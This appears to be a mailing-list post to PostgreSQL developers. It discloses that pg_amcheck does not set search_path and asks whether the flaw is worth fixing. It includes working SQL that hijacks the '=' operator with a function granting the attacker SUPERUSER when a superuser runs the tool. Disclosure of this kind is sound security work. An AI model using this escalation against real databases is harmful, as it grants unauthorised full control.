Hi, hackers!
As I see pg_amcheck doesn't set search_path.
It runs SQL queries like:
SELECT n.nspname, x.extversion FROM pg_catalog.pg_extension x JOIN
pg_catalog.pg_namespace n ON x.extnamespace = n.oid WHERE x.extname =
'amcheck'
Let's suppose search_path for database is set:
search_path = 'myschema, pg_catalog'
Then
CREATE FUNCTION myschema.evil(name, name) RETURNS bool AS $$
ALTER USER attacker WITH SUPERUSER;
SELECT $1 OPERATOR(pg_catalog.=) $2;
$$ LANGUAGE sql;
CREATE OPERATOR myschema.= (LEFTARG = name, RIGHTARG = name,
PROCEDURE = myschema.evil);
Then run pg_amcheck as superuser.
So the user attacker can become SUPERUSER.
Is this scenario worth fixing?
Regards,
Pavel Borisov
Supabase